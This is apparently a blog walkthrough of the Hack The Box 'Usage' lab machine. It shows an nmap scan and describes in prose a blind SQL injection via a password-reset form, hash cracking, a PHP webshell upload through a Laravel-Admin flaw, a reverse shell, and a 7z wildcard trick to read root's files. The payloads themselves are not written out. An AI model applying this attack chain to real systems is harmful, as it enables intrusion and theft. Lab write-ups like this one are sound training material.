Hack The Box: Usage Machine Walkthrough – Easy Difficulty

In this post, I would like to share a walkthrough of the Usage Machine from Hack the Box

This room will be considered an Easy machine on Hack the Box

What will you gain from the Usage machine?

For the user flag, you need to abuse blind SQL injection vulnerability in a password reset form, which I exploited to dump the database and locate the admin login credentials. The admin panel, built with Laravel-Admin, has a vulnerability that allows uploading a PHP webshell as a profile picture by altering the file extension after client-side validation.

As for the root flag, you need to explore and discovered a password in a Monit configuration file and exploited a wildcard vulnerability in 7z to read files as the root user.

Information Gathering on Usage Machine

Once we have started the VPN connection which requires a download from Hackthebox, we can start

┌─[darknite@parrot]─[~/Documents/htb/usage]
└──╼ nmap -sV -sC -oA initial 10.10.11.18
# Nmap 7.94SVN scan initiated Fri Aug  9 19:38:38 2024 as: nmap -sV -sC -oA initial 10.10.11.18
Nmap scan report for 10.10.11.18 (10.10.11.18)
Host is up (0.016s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
|_  256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug  9 19:38:48 2024 -- 1 IP address (1 host up) scanned in 10.27 seconds
┌─[darknite@parrot]─[~/Documents/htb/usage]
└──╼ $

Let’s access the website interface

However, it have redirected to a login page

Let’s try to access the dashboard by using the default credentials but sadly we cannot access the dashboard at all.

The screenshot above show the request via burpsuite

I managed to found a Reset Password and let’s try to see if anything occurs

The packet will look something as shown above.

Enumerate the MySQL database

When testing with the error syntax, we managed to find Blind SQLi command which it provide us with HTTP 500 Internal Server Error.

Therefore, let’s analyze the SQLinjecetion by using the sqlmap tool which lead to Time-based Attack

We should be able to obtain the database on the system using the sqlmap which it lead to admin’s hash

As a result, we can copy-paste the hashes into our attacker’s machine and crack it.

After a while, we managed to crack the hash as whatever1

However, we didn’t have any potential website to enter the credentials into

Nothing that we can found on the directory too.

Let’s enumerate the subdomain by using gobuster but we didn’t found anything at all.

However, we managed to find the subdomain when we changed using ffuf tool

Therefore, let’s try to access the subdoamin but we did find a new login page

We did notice that there’s version that we can abuse for the next stage

After doing some research, i managed to find a CVE-2023-24249 which can be found here

Therefore, let’s try to exploit on the webite above

We are required to upload the a file that contain a PHP simple one liner

It have successfully uploaded to the website dashboard

Let’s test the PHP code by execute one command injection and it works like charm!

As a result, let’s inject the request with our reverse shell payload

We can read the user flag by typing the “cat user.txt” command

Escalate to Root Privileges Access

We cannot find the binary using the normal way because we don’t have any password for dash’s access

Finally, we found the paassword for one credentials but we didn’t know the password can be use for which username

There’s three user that we can try access by entering the password that we found earlier.

The password can be use for xander’s access

At least, we can find the binary in xander’s access

Sadly, we cannot get a proper code for the binary use

We can use the command above to grab the root’s flag and also root’s SSH key

Let’s execute the binary and see the response of it

After a while, we managed to get the SSH key for root’s shell

We can read the root flag by typing the “cat root.txt” command